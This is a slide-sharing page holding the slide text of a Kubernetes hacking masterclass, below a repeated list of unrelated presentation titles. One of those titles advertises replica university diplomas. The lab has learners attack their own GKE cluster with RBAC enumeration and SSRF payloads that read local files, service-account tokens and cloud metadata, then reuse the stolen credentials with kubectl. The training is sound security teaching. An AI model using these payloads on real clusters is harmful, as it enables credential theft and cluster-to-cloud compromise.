Need for Speed: Removing speed bumps from your Symfony projects ⚡️Need for Speed: Removing speed bumps from your Symfony projects ⚡️
Need for Speed: Removing speed bumps from your Symfony projects ⚡️
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
 
Webinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for EmbeddedWebinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for Embedded
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
 
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxTop Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE WHATSAPP.pptx
LORRAINE ANDREI_LEQUIGAN_HOW TO USE WHATSAPP.pptxLORRAINE ANDREI_LEQUIGAN_HOW TO USE WHATSAPP.pptx
LORRAINE ANDREI_LEQUIGAN_HOW TO USE WHATSAPP.pptx
 
Artificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension FunctionsArtificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension Functions
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
 
What is Augmented Reality Image Tracking
What is Augmented Reality Image TrackingWhat is Augmented Reality Image Tracking
What is Augmented Reality Image Tracking
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
 
Transform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR SolutionsTransform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR Solutions
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
 
SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024SWEBOK and Education at FUSE Okinawa 2024
SWEBOK and Education at FUSE Okinawa 2024
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
DDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systemsDDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systems
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOMLORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
 
Graspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code AnalysisGraspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code Analysis
 
Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...
Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...
Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...
 
E-commerce Application Development Company.pdf
E-commerce Application Development Company.pdfE-commerce Application Development Company.pdf
E-commerce Application Development Company.pdf
 

Appsecco Kubernetes Hacking Masterclass Presentation Slides

  • 1. Appsecco Case Studies 2022 mid-year Some of our work so far in 2022 15th Dec 2023
  • 2. What will we do today? 1. Deploy a GKE cluster in our own accounts and setup some misconfigurations to exploit 2. Talk about some relevant Kubernetes controls for today's masterclass 3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster 4. Q&A o use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
  • 4. Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET! https://appsecco-masterclass.s3.amazonaws.com/commands.txt Login to Google Cloud Console and in the same browser open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell. https://console.cloud.google.com/ https://shell.cloud.google.com/?show=terminal
  • 5. Make sure you run the commands from the Google CloudShell 1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing. 2. Note the IP address printed at the end of the command
  • 7. Kubernetes, and depending on the cloud platform it is run on top of, has multiple security features and controls built into the environment. • As hackers we rely on these to be misconfigured or absent :) We will look at 2 main security/concepts in Kubernetes, relevant to our class today 1. Pod Security Admission 2. Role Based Access Control
  • 8. 1. Let's create 2 namespaces each with a different Pod Security Standard 2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces o kubectl apply -f restricted-namespace.yaml o kubectl apply -f privileged-namespace.yaml 3. Now attempt to start a privileged pod within each of the namespaces o kubectl get ns o kubectl apply -f nginx-privileged.yaml -n privileged-namespace o kubectl apply -f nginx-privileged.yaml -n restricted-namespace 4. What do you see?
  • 9. Pod Admission Controller – In simple terms • This is code that intercepts requests reaching the API server to verify if the object (pod, namespace etc.) create request passes a list of allowed checks or not. o The list of checks the request is compared against are called the Pod Security Standards o There are 3 standards - privileged, baseline, and restricted
  • 10. Let's enumerate what roles and clusterroles are present in this cluster and how they are bound 1. Enumerate roles within the kube-system namespace o kubectl get roles -n kube-system o kubectl get rolebindings -n kube-system 2. For each of the rolebindings enumerate the subject attached o kubectl get rolebindings <BINDING_NAME> -n kube-system 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud- provider --list
  • 11. Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC 1. Enumerate clusterroles across the cluster o kubectl get clusterroles o kubectl get clusterrolebindings 2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached o kubectl get clusterrolebindings <BINDING_NAME> 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:apps:default --list
  • 12. Role and ClusterRole and Bindings • An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions are purely additive (there are no "deny" rules). • A Role always sets permissions within a particular namespace;when you create a Role,you have to specifythe namespace it belongs in. • ClusterRole,is a non-namespaced resourceand applies to the entire cluster. • Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions • If you want to define a role within a namespace,use a Role;if you want to define a role cluster- wide, use a ClusterRole.
  • 15. • All pods will have access to the default service account mounted as a file system object within the pod at o /var/run/secrets/kubernetes.io/serviceaccount/token o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt • We can extract them and use them to interact with the cluster o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes So how do we gain access to this service account or files from the pod?
  • 16. • Let's take a closer look at the app that was deployed • Login to the application using username serveradmin and password monitorworld • What is the app's functionality? • What vulnerability is present here?
  • 17. • The application takes a URL from the user and makes a server side request on the user's behalf o Such a feature, if not protected properly is often vulnerable to Server Side Request Forgeries (SSRF/XSPA) • Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files! • Try these as input o file:///etc/passwd o file:///etc/shadow
  • 18. • Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell. file:///var/run/secrets/kubernetes.io/serviceaccount/token file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt • Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes • Use auth plugin to view your current access with the stolen credentials kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt - -list
  • 19.
  • 21. We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions 1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE information etc. • file:///proc/self/environ 2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials • http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env 3. Fetch the Google VM instance's compute service account's token and scope to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment. • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes • http://169.254.169.254/computeMetadata/v1/project/project-id
  • 23. kube-env from Instance Metadata cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk '{print $2}' | base64 -d > kubelet.crt cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk '{print $2}' | base64 -d > kubelet.key cat kube-env | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt kubectl auth --client-certificate=kubelet.crt - -client-key=kubelet.key --certificate- authority=apiserver.crt --server=$KUBERNE TES_API_SERVER can-i --list https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
  • 24. Google Cloud Compute SA Token Stealing
  • 25. Tear Down the Cluster (to avoid credit wastage) (optional, don't if you want to practice)
  • 26. 1. https://kubernetes.io/docs/concepts/security/pod-security-admission/ 2. https://kubernetes.io/docs/concepts/security/pod-security-standards/ 3. https://kubernetes.io/docs/reference/access-authn-authz/rbac/ 4. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a 5. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5 6. https://blog.appsecco.com/hacking-an-aws-hosted-kubernetes-backed-product-and-failing-904cbe0b7c0d 7. https://kloudle.com/blog/part-1-mapping-the-mitre-att-ck-framework-to-your-kubernetes-cluster-initial-access/ 8. https://kloudle.com/academy/simple-steps-to-set-up-a-2-node-kubernetes-cluster-using-kubeadm/ 9. https://kloudle.com/academy/auditing-kubernetes-with-kubeaudit-conducting-an-assessment/ 10. https://kloudle.com/blog/rogue-one-a-certified-kubernetes-administrator-cka-exam-story/ 11. https://kloudle.com/blog/refuting-aws-chain-attack-digging-deeper-into-eks-zero-days-claim/ 12. https://kloudle.com/academy/5-important-security-settings-you-need-to-review-for-your-gke-clusters/ 13. https://kloudle.com/blog/developerweek-europe-2021-walkthrough-of-the-talk-slides-and-audience-questions/ 14. https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata 15. Hacking Kubernetes Clusters - https://www.youtube.com/watch?v=xDj4_ZI1Y9A 16. Kubernetes 101 - https://www.youtube.com/watch?v=Z5nj6IpNJIM 17. Kubernetes Crash Course for Absolute Beginners - https://youtu.be/s_o8dwzRlu4?t=104
  • 27. Q&A
  • 28. • Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration Testing as a Service at Appsecco • Appsecco is a boutique security consulting company with customers across the world. • Over a decade and half experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers • Love to teach! Speak and train at a bunch of conferences! https://www.linkedin.com/in/riyazw/ riyaz@appsecco.com | +91 9886042242 https://appsecco.com | https://blog.appsecco.com
  • 29. About Appsecco Pragmatic, holistic, business-focused approach Specialist Cloud and Application Security company Highly experienced and diverse team Assigned multiple CVEs Certified hackers OWASP chapter leads Cloud and Kubernetes security experts Black Hat & Def Con speakers